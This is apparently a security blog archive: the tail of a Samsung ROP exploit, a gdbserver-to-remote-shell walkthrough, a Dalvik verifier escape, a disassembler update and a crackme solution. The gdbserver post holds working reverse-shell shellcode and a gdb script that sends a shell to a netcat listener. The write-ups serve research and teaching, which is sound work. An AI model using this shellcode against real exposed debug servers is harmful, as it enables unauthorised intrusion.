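chain = [base_wincrt + 0x0001a14e, 0x00000000, base_wincrt + 0x0000bd5b]
print([hex(x) for x in patch_jmp_esp(chain, base_wincrt)])
# ['0x1001a14e', '0x10009558', '0x1000bd5b']
```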

Having fixed the ROP chain, our final ROP chain including some MessageBox()
shellcode, wrapped into a C file looks like the following. (Woah,
somebody added C dumping support to mona yesterday!) In case you’re interested
in the binary, to be run when the DLL is loaded into memory, it can be found
here.

Conclusion

This was the first time I tried mona and I’m genuinely happy about it. Very
easy to use and it did the job for me :) Ah yeah, so anyone with this
particular Samsung software on his computer.. how do I even.. I guess it’s
just “another one of those”.

Turning arbitrary GDBserver sessions into RCE


Today we’ll see how we can turn an arbitrary GDBserver remote debugging
session into remote code execution. First of all, let’s assume gdbserver is
run using the following command. We will also assume that the target
architecture is Linux/x86, but you can port the technique to other
architectures as needed.

$ gdbserver --remote-debug 0.0.0.0:1337 ./some_unknown_binary

What happens is that gdbserver will serve as many remote debugging sessions as
possible while it’s running. That is, we can have as many remote debugging
sessions as we like, until the gdbserver is killed (but only one at a time.)
This makes sense, because if we are debugging a target, then we don’t want to
restart gdbserver every time we hit “run” in gdb.

Let’s assume one were to run gdbserver in a screen, to prevent accidental
connection resets resulting in losing the gdbserver session (assuming we’re
ssh’ing into a remote server.) Exactly this happened to me - I recently found
out that there were still two (of my) gdbservers running in a screen from
when we were playing a CTF, almost two months ago.

Now anyone with the IP address and port number can attach to your gdbserver by
doing the following.

$ gdb
(gdb) target extended-remote host:port
Remote debugging using host:port
(gdb) run
[..]
[Inferior 1 (process 42) exited normally]
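Under the hood, target extended-remote makes gdb talk the GDB Remote Serial Protocol over plain TCP, and nothing in that exchange authenticates the client. Each packet is framed as $payload#checksum, where the checksum is the sum of the payload bytes modulo 256 written as two hex digits. A minimal framing sketch (rsp_packet is a hypothetical helper; escaping of special characters is omitted):

```python
def rsp_packet(payload):
    """Frame a GDB Remote Serial Protocol packet: $<payload>#<checksum>.

    The checksum is the sum of the payload bytes modulo 256, as two hex digits.
    Escaping of '$', '#' and '}' inside payloads is not handled here.
    """
    data = payload.encode("ascii")
    checksum = sum(data) % 256
    return b"$" + data + b"#" + b"%02x" % checksum


print(rsp_packet("qSupported"))  # b'$qSupported#37'
print(rsp_packet("?"))           # b'$?#3f'
```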

In order not to make the RCE too easy, we’re going to assume that we don’t
have any symbols of the remote binaries, and that all addresses are ASLR’d. In
other words, educated guessing of “main” is useless, and we won’t be able
to do arbitrary function calls during debugging such as the following.

(gdb) call system("/bin/sh")
No symbol table is loaded.  Use the "file" command.

However, if we enter a breakpoint at an invalid address and run the debuggee,
we get an error right before executing the very first instruction of the
process. This looks roughly like the following :)

(gdb) break *0
Breakpoint 1 at 0x0
(gdb) run
Starting program:
warning: Could not load vsyscall page because no executable was specified
try using the "file" command first.
Warning:
Cannot insert breakpoint 1.
Error accessing memory address 0x0: Unknown error 18446744073709551615.
(gdb) info reg eip
eip            0xf7fe0850       0xf7fe0850

At this point the debuggee has been executed, and we’re able to inspect and
modify its state. We continue by removing our earlier breakpoint. Now it’s
time for the fun part.

Reverse Shell Shellcode

After a bit of googling, I stumbled upon the following shellcode. This
shellcode connects to an ip address and port of your choosing, and executes
/bin/sh with stdin, stdout, and stderr set to your socket. If we have netcat
listening on the remote ip address and port, then it’ll get a connection
request upon execution of the shellcode, and we can use it to run arbitrary
shell commands on the machine running the shellcode, as if we had shell access. After an
initial test, this shellcode seemed to work on my x86_64 machine running a
32-bit application. However, there’s a small problem with this shellcode. If
we look closely at the shellcode, we notice the following.

804807b:   31 db        xor    ebx,ebx
804807d:   b3 02        mov    bl,0x2
[..]
804808a:   fe c3        inc    bl
[..]
8048098:   b1 03        mov    cl,0x3
804809a <dupfd>:
804809a:   fe c9        dec    cl
804809c:   b0 3f        mov    al,0x3f
804809e:   cd 80        int    0x80      ; system call
80480a0:   75 f8        jne    804809a

Investigating this system call further, we see that this is the dup2
system call. However, the ebx register, or old_fd, seems to be
constant here - namely three. (I figured this out while brushing my teeth.)
This is the fd you get when a program opens its first file descriptor (0, 1,
and 2 being stdin, stdout, and stderr), which is something we cannot assume,
and is definitely not the case when running the debuggee under gdbserver.
(E.g., this shellcode fails if you open a file or socket before running it,
because the fd of the socket allocated by our shellcode will then be four, for
example, instead of three.)

If we look further, we see that the esi register contains the fd number
returned from the socket system call. (Actually, this is the socketcall
system call with SOCKOP_socket as operation, but that’s a minor detail
specific to Linux/x86.)

8048075:   cd 80        int    0x80      ; socket()
8048077:   89 c6        mov    esi,eax   ; esi = fd
[..]
804808e:   6a 10        push   0x10      ; sizeof(sockaddr_in)
8048090:   51           push   ecx       ; sockaddr_in *
8048091:   56           push   esi       ; fd
8048092:   89 e1        mov    ecx,esp
8048094:   cd 80        int    0x80      ; connect()

Long story short, we want to preserve esi before the connect system call,
and store it into ebx after the system call. Thus ebx will contain the fd of
our socket, and the system calls to dup2 will duplicate the correct fd into
stdin, stdout, and stderr. The following snippet shows the updated shellcode.
This is the shellcode that we’re going to use.

8048092:   89 e1        mov    ecx,esp
+                       push   esi       ; push fd
8048094:   cd 80        int    0x80      ; connect()
+                       pop    ebx       ; pop fd into ebx
8048096:   31 c9        xor    ecx,ecx
8048098:   b1 03        mov    cl,0x3
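The two added instructions amount to a small byte-level patch: push esi encodes as the single byte 0x56 and pop ebx as 0x5b. A minimal Python sketch of that patch follows, assuming we start from the unmodified shellcode bytes; apply_fd_fix is a hypothetical helper for illustration, not part of the original exploit.

```python
# Bytes around the connect() system call in the original shellcode:
#   89 e1 mov ecx,esp / cd 80 int 0x80 / 31 c9 xor ecx,ecx
ORIGINAL_CONNECT = bytes.fromhex('89e1cd8031c9')
# The same sequence with the fd fix applied:
#   89 e1 mov ecx,esp / 56 push esi / cd 80 int 0x80 / 5b pop ebx / 31 c9 xor ecx,ecx
PATCHED_CONNECT = bytes.fromhex('89e156cd805b31c9')


def apply_fd_fix(shellcode: bytes) -> bytes:
    """Wrap connect() in push esi / pop ebx so that ebx holds the socket fd
    when the dup2 loop runs (hypothetical helper)."""
    # The socket() call also starts with 89 e1 cd 80, but is followed by
    # 89 c6 (mov esi,eax), so this pattern only matches the connect() call.
    if shellcode.count(ORIGINAL_CONNECT) != 1:
        raise ValueError('expected exactly one connect() sequence to patch')
    return shellcode.replace(ORIGINAL_CONNECT, PATCHED_CONNECT)
```

Applying it to the unpatched shellcode grows it by exactly two bytes, one per inserted instruction.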

Running the Shellcode

All we have left to do is to patch the correct ip address and port into the
shellcode, namely those of our listening netcat instance (e.g., running
“nc -vvv -l 9001” on your favourite linux box), write the shellcode to the
memory that eip points to, and finally, run it.
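The placeholder bytes being patched belong to the struct sockaddr_in that the shellcode builds on the stack: it pushes the ip address, then pushw's the port, then pushes bx (which holds 2, AF_INET). A minimal sketch of the resulting first 8 bytes, assuming x86's little-endian byte order for sin_family; sin_port and sin_addr must be in network byte order, which is why the port is packed big-endian with '>H'. sockaddr_in_prefix is an illustrative name.

```python
import socket
import struct

AF_INET = 2  # the value the shellcode pushes via bx


def sockaddr_in_prefix(ip: str, port: int) -> bytes:
    """First 8 bytes of the struct sockaddr_in built on the stack:
    sin_family (host order, little-endian on x86), then sin_port and
    sin_addr (both in network byte order)."""
    return (struct.pack('<H', AF_INET)
            + struct.pack('>H', port)
            + socket.inet_aton(ip))


print(sockaddr_in_prefix('1.1.1.1', 31338).hex())  # prints 02007a6a01010101
```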

For my exploit I’m using gdb’s Python bindings, as initially I had another
technique in mind, which required a bit more scripting. Following is the
final part of the code, which generates the shellcode, writes it to the memory
at eip, and executes it. We have two continue statements at the end, as the
shellcode will execve into /bin/sh, after which we’ll get an error that
gdbserver can’t read the memory at eip anymore, so we have to instruct
gdbserver to continue past that error.

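import socket
import struct
import gdb  # only available inside gdb, e.g. when run as: gdb -x gdbservrce.py

# ip address and port of the listening netcat instance (placeholders, patch these)
netcat = ('192.0.2.1', 31338)

def reverse_shell(ip, port):
    """Modified x86 reverse shell (including the push esi / pop ebx fd fix)"""
    ip, port = socket.inet_aton(ip), struct.pack('>H', port)
    sc = bytes.fromhex(
        '31c031db31c931d2b066b301516a066a016a0289e1cd8089c6b06631dbb30268'
        '000000006668ffff6653fec389e16a10515689e156cd805b31c9b103fec9b03f'
        'cd8075f831c052686e2f7368682f2f626989e3525389e15289e2b00bcd80')
    # 0xffff is the port placeholder, 0x00000000 the ip address placeholder
    return sc.replace(b'\xff' * 2, port).replace(b'\x00' * 4, ip)

# write the shellcode byte by byte to the memory that eip points to
for idx, ch in enumerate(reverse_shell(*netcat)):
    gdb.execute('set *(unsigned char *)($eip + %d) = %d' % (idx, ch))
# run the shellcode, then continue past the error after its execve
gdb.execute('continue')
gdb.execute('continue')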

Final Exploit

The final exploit code can be found here.

Execution of the code may look like the following. We’ll need three shells.
(Optionally on different servers - do as you like.)

Shell 1

$ gdbserver --remote-debug 0.0.0.0:1337 ./some_unknown_binary
[..]

Shell 2

$ nc -vvv -l 31338
[..]

Shell 3

$ vim gdbservrce.py   # Patch the ip addresses
$ gdb -x gdbservrce.py
[..]

Enjoy Shell!

Now if we go back to Shell #2, we’ll see the following, and can run arbitrary
shell commands.

skier@box:~$ nc -vvv -l 31338
Connection from 1.1.1.1 port 31338 [tcp/*] accepted
id
uid=1010(skier) gid=1011(skier) groups=1011(skier)

Conclusion

This is a funny technique which basically tells you not to have gdbservers
running around :)

Dalvik Research


Over the past couple of months I’ve been doing some research with regards to
the Dalvik Virtual Machine, which is Android’s Java Virtual Machine
implementation. Long story short, most Android applications are written in
Java, which gets compiled to Dalvik Bytecode, and ends up in an APK file (a
Zip file.)

As part of my research on Dalvik, I analyzed both the Dalvik VM itself and
various applications - with a focus on their obfuscation techniques (which
make analysis harder.) This research was presented at a couple of
conferences.

Back in June I already posted my slides for my AthCon
talk, which focussed on Deobfuscation. Then a couple of weeks ago,
I did a similar talk together with Rodrigo Chiossi at
H2HC, featuring new and updated content, with a bit more focus on some
of the techniques involved in creating new Dex files.

Finally I did a talk yesterday at Hack.lu, focussing on the
Dalvik Virtual Machine itself. In this talk I presented an
“undocumented feature” which I found in the way Android verifies Dex files,
allowing an attacker to run arbitrary Dalvik Bytecode (which is normally not
allowed - all code must normally be hardcoded and is verified upon
installation.) Following are the slides and the
Proof of Concept DvmEscape application.

As explained during the presentation, when running this application on your
phone or emulator, you can type arbitrary Dalvik Bytecode and execute it by
clicking on the “Run Dalvik” button. On the 30th slide of the presentation one
can find two examples of valid Dalvik Bytecode which, when run, will return
a fancy number. Unfortunately the dalvik.py disassembler mentioned in the
slides is currently not open source, but for some more documentation on the
Dalvik Bytecode there’s always the Dalvik Bytecode reference.
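As an illustration of what a tiny "return a number" snippet looks like at the byte level, here is a sketch that assembles const/4 followed by return, using the instruction formats from the Dalvik Bytecode reference (const/4 is opcode 0x12 in format 11n, return is opcode 0x0f in format 11x). These are not the examples from the slides, and the hex string is not necessarily the input format DvmEscape expects; const4 and return_reg are illustrative names.

```python
def const4(reg: int, value: int) -> bytes:
    """Encode const/4 vA, #+B (opcode 0x12, format 11n: B|A|op).
    B is a signed 4-bit literal, A a 4-bit register number."""
    if not (0 <= reg < 16 and -8 <= value < 8):
        raise ValueError('register or literal out of range for const/4')
    unit = ((value & 0xf) << 12) | (reg << 8) | 0x12
    return unit.to_bytes(2, 'little')  # dex code units are little-endian


def return_reg(reg: int) -> bytes:
    """Encode return vAA (opcode 0x0f, format 11x: AA|op)."""
    if not 0 <= reg < 256:
        raise ValueError('register out of range for return')
    return ((reg << 8) | 0x0f).to_bytes(2, 'little')


# const/4 v0, #7 ; return v0
print((const4(0, 7) + return_reg(0)).hex())  # prints 12700f00
```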

Win32 Calc.exe Proof of Concept

If you want to run my win32 calc.exe Proof of Concept from the presentation
you’ll have to do a couple of things:

  • Install CalcExe.apk on the device
  • Get the adb_type.py script, which “types” a string into
    the emulator
  • Finally, type the contents of payload.txt into the DvmEscape application
    with the following command.

$ python adb_type.py $(cat payload.txt)

Note that typing the bytecode into the emulator (or phone?!) takes roughly a
minute. (No, there appears to be no support for using the clipboard with the
emulator.) After that, just click on the button and calc should pop :)
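For reference, one way to "type" a string into an emulator is Android's `adb shell input text` command, which treats %s as a space. The following sketch is not the actual adb_type.py; adb_type_commands and the chunk size of 64 are hypothetical choices, and it assumes the payload contains no shell metacharacters (as is the case for a hex string).

```python
import subprocess


def adb_type_commands(text: str, chunk: int = 64) -> list:
    """Build `adb shell input text` invocations that type `text` in chunks.
    Spaces are escaped as %s, which `input text` turns back into spaces."""
    commands = []
    for i in range(0, len(text), chunk):
        part = text[i:i + chunk].replace(' ', '%s')
        commands.append(['adb', 'shell', 'input', 'text', part])
    return commands


def adb_type(text: str) -> None:
    """Type `text` into the connected device or emulator."""
    for command in adb_type_commands(text):
        subprocess.run(command, check=True)
```

Splitting the payload into chunks keeps each command line short; the trade-off is one adb round trip per chunk, which is part of why typing a large payload is slow.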

For more information or questions, feel free to reach me at my new email
address: mail.

Dirkjan Email Feed

Dirkjan Strip Mailing List

This blogpost is mainly for Dutch (speaking) people (although I’ll
still keep the blogpost in English.) As I’m sure you’re all well aware,
Dirkjan is an awesome Dutch comic.

A couple of weeks ago I stumbled upon the weekly feed from Veronica.
Naturally, not wanting to check the website every week, I came up with a very
simple Dirkjan Feed in the shape of a Mailing List. Of course this is not
so much a mailing list, as it’s mostly one-way traffic, but it’s a fun way to
keep up-to-date with two Dirkjans a week!

Subscribe

Having said that, one can subscribe here simply by filling out
the email address. Other information is optional and not very interesting.
(Yes, the website is a bit ugly - it’s the default mailing list manager.)

By subscribing you agree to being awesome (given you’re interested in reading
Dirkjan) and the legal disclaimer on the bottom of this blogpost.

Subscription

As I’ve only just set up the mailing list, I do not know exactly when new
comics will arrive, but it looks like it will be every Tuesday. Once
subscribed, please do not panic - the comics will come eventually! (Just
wait!)

Legal stuff

I’m not affiliated with Veronica in any way. Any damage done through this
Dirkjan Email Feed is at your own responsibility. I do not intend
to damage Veronica in any way.

That’s all, and have fun reading Dirkjan. Dirkjan is awesome :)

Darm Update - More ARMv7, More Thumb

Darm Updates - More ARMv7, More Thumb

Darm is an ARMv7 disassembler in C. This blogpost is just
a small update about the new stuff in darm from the past couple of
months, as there were some delays due to conferences and other stuff :)

Thumb support

Most notably, Darm has recently gained support for the Thumb instruction
set. Those of you familiar with ARMv7 know that it has two modes, namely, ARMv7
and Thumb. ARMv7 contains pretty much all the instructions you’d ever need,
whereas Thumb is a small subset of the most used ARMv7 instructions, encoded
in only 16 bits rather than the 32 bits of ARMv7 instructions. Needless to
say, Thumb allows for more compact code.

The API to disassemble Thumb instructions is as straightforward as the
equivalent function for disassembling ARMv7 instructions. Furthermore, the two
instruction set modes share the same data structure, darm_t, hence it is
easy to write generic analysis routines without having to worry
whether you’re analyzing ARMv7 or Thumb.

Currently, the C API looks roughly like the following. (This includes the
Thumb2 function; for more information on that, read further.)

#include <stdint.h>

typedef struct _darm_t {
    [...]
} darm_t;

// disassemble an armv7 instruction
int darm_armv7_disasm(darm_t *d, uint32_t w);
// disassemble a thumb instruction
int darm_thumb_disasm(darm_t *d, uint16_t w);
// disassemble a thumb2 instruction
int darm_thumb2_disasm(darm_t *d, uint16_t w, uint16_t w2);

ARMv7 Improvements and Bug Fixes

ARMv7 has mostly had some bug fixes and a couple of new instructions. Nothing
too spectacular, but it’s still improving as I find bugs and stumble upon new
instructions.

Coming up: Thumb2 support

Currently I’m working on getting support for the Thumb2 instruction set as
well. As the Thumb instruction set is fairly limited with regards to the
instructions it can encode, its instructions being only 16 bits in size rather
than 32 bits, there’s also the Thumb2 extension. Thumb2 features almost all of
the instructions (except for maybe a handful) which are also available in the
ARMv7 instruction set, hence allowing the compact Thumb instructions to be
mixed with Thumb2 instructions, which are, like ARMv7 instructions, 32 bits in
size.

Having said that, if there are requests for instructions which you’d like to
see sooner rather than later, please do contact me. At first I aim to support,
let’s say, 90% of the binaries while keeping the amount of implemented
instructions to a “minimum.” That is, I’ll focus on the most used Thumb2
instructions at first, and go for the complete instruction set later.

Difference between ARMv7 and Thumb/Thumb2

A small explanation on ARMv7 vs Thumb/Thumb2.

When branching to code (e.g., with the bx instruction), the target will be
executed as an ARMv7 instruction whenever the address is 4-byte aligned, and
executed as either a Thumb or Thumb2 instruction, depending on its encoding,
when the least significant bit of the address is set. That is, when the
address is not 4-byte aligned, but instead either addr+1 or addr+3 (with addr
being a 4-byte aligned pointer), then the instruction is decoded as being
either Thumb or Thumb2.
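A minimal sketch of the address rule above; branch_target is a made-up name for illustration. Note that in Thumb state the instruction itself starts at the address with bit 0 cleared, so a target of addr+1 fetches from addr and addr+3 fetches from addr+2.

```python
def branch_target(addr: int):
    """Return (mode, fetch address) for a branch target:
    least significant bit set -> Thumb/Thumb2, fetched with bit 0 cleared;
    4-byte aligned -> ARMv7."""
    if addr & 1:
        return 'thumb', addr & ~1
    if (addr & 3) == 0:
        return 'armv7', addr
    raise ValueError('address %#x is neither 4-byte aligned nor Thumb-tagged' % addr)


print(branch_target(0x8003))  # prints ('thumb', 32770), i.e. fetch from 0x8002
```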

The instruction is either decoded as Thumb or Thumb2 depending on a couple of
the most significant bits. When decoded as Thumb, one 16 bit word is fetched
and executed. When decoded as Thumb2, a second 16 bit word is fetched and the
instruction is decoded as if it were a 32 bit word.

In the relevant lines of darm's code we can see the comparison of the
upper 5 bits of the first 16 bit word. When the upper five bits equal either
b11101 (binary 11101, or 29 in decimal), b11110, or b11111, then it is a
Thumb2 instruction. Otherwise it’s a Thumb instruction.
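The upper-five-bits check can be sketched in Python as follows, assuming little-endian instruction memory. is_thumb2 and fetch_thumb are illustrative names, not part of darm's API; the halfwords they return are what darm_thumb_disasm and darm_thumb2_disasm take as their w (and w2) arguments.

```python
import struct

THUMB2_PREFIXES = (0b11101, 0b11110, 0b11111)


def is_thumb2(first_halfword: int) -> bool:
    """True when the upper five bits mark the first half of a 32-bit Thumb2 instruction."""
    return (first_halfword >> 11) in THUMB2_PREFIXES


def fetch_thumb(code: bytes, offset: int):
    """Fetch one Thumb (one 16-bit word) or Thumb2 (two 16-bit words)
    instruction. Returns (kind, halfwords)."""
    (w,) = struct.unpack_from('<H', code, offset)
    if is_thumb2(w):
        (w2,) = struct.unpack_from('<H', code, offset + 2)
        return 'thumb2', (w, w2)
    return 'thumb', (w,)
```

For example, 0x2001 (movs r0, #1) has upper bits 0b00100 and is a 16-bit Thumb instruction, whereas 0xe92d (the first half of push.w) has upper bits 0b11101 and pulls in a second halfword.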

Also note that at the moment there are two separate functions to disassemble
Thumb and Thumb2 instructions, but don’t worry, in the future there’ll be a
nice wrapper around them :)

Contact

For questions etc, you know where to find me.

Solving ZCrackme#2: A Custom Emulator Approach


Due to my non-existent experience with using gdb under ARMv7, I decided to
solve this challenge (the ZCrackme #2 Challenge) using a minimal ARMv7
emulator based on my ARMv7 disassembler. (The original challenge can be found
here.)

ZCrackme#2 Challenge

The binary itself is fairly interesting. It has a structure similar to that of
the first ZCrackme challenge (not sure if there’s a blogpost about that one,
though.) Basically the ELF header is messed up, sections are missing, and the
Entry Point points to a page filled with zeroes.

INIT_ARRAY

Upon further inspection, using readelf -a zcrackme2, we find that the binary
features the so-called preinit-array, init-array, and fini-array dynamic
sections. These dynamic sections in fact represent tables of function
addresses which are called right before the real Entry Point (in the case of
preinit-array and init-array) and when the program exits (in the case of
fini-array.)

Looking up the various virtual offsets using IDA Pro, we find that only the
init-array points to a real address, loc_B0D8. (The other table arrays,
preinit-array and fini-array, are filled with zeroes and -1s, which are
nops - as in, these are not really called.)
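To make the init-array lookup concrete, here is a minimal sketch that parses an ELF32 little-endian dynamic table using the standard DT_* tag values from the ELF specification, and then reads an array while skipping the 0 and -1 entries. The read(addr, size) callback standing in for the loaded binary's memory is hypothetical; in practice readelf and IDA Pro do this job for us.

```python
import struct

# Dynamic tag values from the ELF specification
DT_NULL = 0
DT_INIT_ARRAY, DT_FINI_ARRAY = 25, 26
DT_INIT_ARRAYSZ, DT_FINI_ARRAYSZ = 27, 28
DT_PREINIT_ARRAY, DT_PREINIT_ARRAYSZ = 32, 33


def parse_dynamic(data: bytes) -> dict:
    """Parse an ELF32 little-endian dynamic table: (d_tag, d_val) pairs of
    4 bytes each, terminated by DT_NULL."""
    tags = {}
    for offset in range(0, len(data) - 7, 8):
        tag, value = struct.unpack_from('<iI', data, offset)
        if tag == DT_NULL:
            break
        tags[tag] = value
    return tags


def array_functions(read, tags: dict, array_tag: int, size_tag: int) -> list:
    """Return the function addresses of a (pre)init/fini array, skipping the
    0 and -1 entries that are not called. `read(addr, size)` is a hypothetical
    accessor for the loaded binary's memory."""
    if array_tag not in tags:
        return []
    addr, size = tags[array_tag], tags.get(size_tag, 0)
    words = struct.unpack('<%dI' % (size // 4), read(addr, size))
    return [w for w in words if w not in (0, 0xffffffff)]
```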

We conclude that the actual entry point, or, the code that will be executed
first, is located at this (loc_B0D8) address. From analyzing this routine in
IDA Pro, we see some sort of decryption loop which overwrites some memory.
Finally, after executing said decryption loop, an interesting system call is
performed, namely #0xf0002. We find that this is the ARM-specific cacheflush
system call (__ARM_NR_cacheflush), which is what __clear_cache uses.

__clear_cache

Basically, before the decrypted code can be executed, the instruction cache
first has to be flushed for the particular address range, in order to make
sure that the new code will be executed, rather than any stale code remaining
in the cache.

Similar tricks to this (decrypting code and clearing the cache) are performed
a total of five times in this crackme.

So, having cleared the cache, the execution flow of the crackme now ends up in
the decrypted code, which, in turn, does some more rounds of decryption.

Code Decryption

As mentioned, the crackme overwrites memory of the ELF file a total of five
times. One of these “decryptions” in fact zeroes the first 100 bytes of the
ELF file, wiping out the ELF header. As our goal is to dump a decrypted
version of the crackme binary, this ELF header corruption does not help us
(as IDA Pro wouldn’t understand the binary anymore.)

Reconstructing a Decrypted Binary

As each decryption is followed by clearing the cache, we dump a new binary
each time the cache is cleared. We do this by applying the changes to a copy
of the original binary. That is, we read the decrypted data from emulator
memory, and write it into our copy of the original binary. We do this for
each decryption, except for the one iteration where the ELF header is zeroed
out. (Note: the __clear_cache system call takes the start address as its first
parameter and the end address as its second parameter, hence it is trivial for
us to find out which chunks of memory have been decrypted.)
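A minimal sketch of that bookkeeping, assuming a hypothetical emulator interface: a regs dict, a read(addr, size) callback for emulator memory, and the loadable segments as (p_vaddr, p_offset, p_filesz) tuples. It follows the ARM EABI convention of passing the system call number in r7 and the arguments in r0/r1. Skipping any range that starts inside the 52-byte ELF32 header is a simplification of "except for the iteration that zeroes the header", and each decrypted range is assumed to lie within a single segment.

```python
ARM_NR_CACHEFLUSH = 0xf0002  # __ARM_NR_BASE (0x0f0000) + 2
ELF32_EHDR_SIZE = 52         # size of an ELF32 header


def vaddr_to_offset(segments, vaddr: int) -> int:
    """Map a virtual address to a file offset via (p_vaddr, p_offset, p_filesz)."""
    for p_vaddr, p_offset, p_filesz in segments:
        if p_vaddr <= vaddr < p_vaddr + p_filesz:
            return p_offset + (vaddr - p_vaddr)
    raise ValueError('address %#x is not backed by the file' % vaddr)


def on_svc(regs: dict, read, image: bytearray, segments) -> bool:
    """Hypothetical emulator hook for svc: on a cache flush, copy the freshly
    decrypted range from emulator memory into our copy of the binary.
    Returns True when the image was patched."""
    if regs['r7'] != ARM_NR_CACHEFLUSH:
        return False
    start, end = regs['r0'], regs['r1']  # end address is exclusive
    offset = vaddr_to_offset(segments, start)
    if offset < ELF32_EHDR_SIZE:
        return False  # skip the iteration that wipes the ELF header
    image[offset:offset + (end - start)] = read(start, end - start)
    return True
```

After each successful patch, the image can be written out as a new dump, which gives one binary per decryption round.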

Scripting the Emulator

My script, although a bit messy, dumps the binary a couple of times, which
results in the final binary we’re interested in. The unpacked binary can be
found here. (Note that this unpacked binary may be inaccurate with regards to
global variables etc. that have been updated during runtime but are not
reflected in this version of the binary.)

Having successfully dumped the unpacked binary, it is now time for some static
analysis on this binary. Do note that our emulator should run fine on
Windows and Linux (with a 32bit Python installed, that is.)

The actual Crackme

Looking through the dumped binary, we find ourselves looking at sub_87B4,
which is the function where the real stuff is happening (argc/argv parsing,
that is.)

There are a couple of odd text messages which will be printed whenever
incorrect information is entered on the commandline. Finally, we find some
interesting function calls, among which one to sub_8638, which seems to
decrypt the string buffer that can be found at byte_9C35, and one to another
function, which performs a custom strcmp() against the argument on the
commandline.

The string at byte_9C35 is decrypted by xor’ing it with 0x0d (into a buffer
on the stack, by sub_8638), resulting in the string ZenCracking. With that,
we’ve solved the challenge.
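The single-byte xor with 0x0d can be sketched as follows. Since xor is its own inverse, the encrypted bytes in the usage example are derived from the known answer rather than copied from byte_9C35 in the binary; xor_decrypt is an illustrative name.

```python
def xor_decrypt(data: bytes, key: int = 0x0d) -> bytes:
    """Single-byte xor, mirroring the 0x0d "encryption" described above."""
    return bytes(b ^ key for b in data)


encrypted = xor_decrypt(b'ZenCracking')  # xor is its own inverse
print(xor_decrypt(encrypted))  # prints b'ZenCracking'
```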

Conclusion

In case somebody has a working gdb setup for ARMv7, this challenge is probably
pretty easy (i.e., step through the various decryption iterations, and try to
find the custom strcmp.) However, I had fun implementing the simple ARMv7
emulator, which is in fact pretty tricky, with all the conditional execution
going on.
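The conditional execution refers to the 4-bit condition field (bits 31 to 28) that most ARMv7 instructions carry, which an emulator has to check against the N, Z, C and V flags before executing the instruction. A sketch of that check, based on the condition code table in the ARM Architecture Reference Manual; it is not the code of the emulator used above, and condition_passed is an illustrative name.

```python
def condition_passed(instr: int, n: bool, z: bool, c: bool, v: bool) -> bool:
    """Evaluate the condition field of an ARMv7 (ARM state) instruction."""
    cond = (instr >> 28) & 0xf
    if cond == 0xf:
        # 0b1111 selects the unconditional instruction space, not a condition
        raise ValueError('cond 0xf: unconditional instruction encoding')
    checks = {
        0x0: z,                 # EQ
        0x1: not z,             # NE
        0x2: c,                 # CS/HS
        0x3: not c,             # CC/LO
        0x4: n,                 # MI
        0x5: not n,             # PL
        0x6: v,                 # VS
        0x7: not v,             # VC
        0x8: c and not z,       # HI
        0x9: not c or z,        # LS
        0xa: n == v,            # GE
        0xb: n != v,            # LT
        0xc: not z and n == v,  # GT
        0xd: z or n != v,       # LE
        0xe: True,              # AL
    }
    return checks[cond]
```

For example, 0x03a00001 (moveq r0, #1) only executes when the Z flag is set, while 0xe3a00001 (mov r0, #1) always executes.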

Now a harder crackme? Let’s hope the next one does not involve xor
“encryption” :p Zimperium’s response was, however, that having gotten to the
xor-decryption part already shows enough knowledge and understanding of ARMv7,
to which I agree :)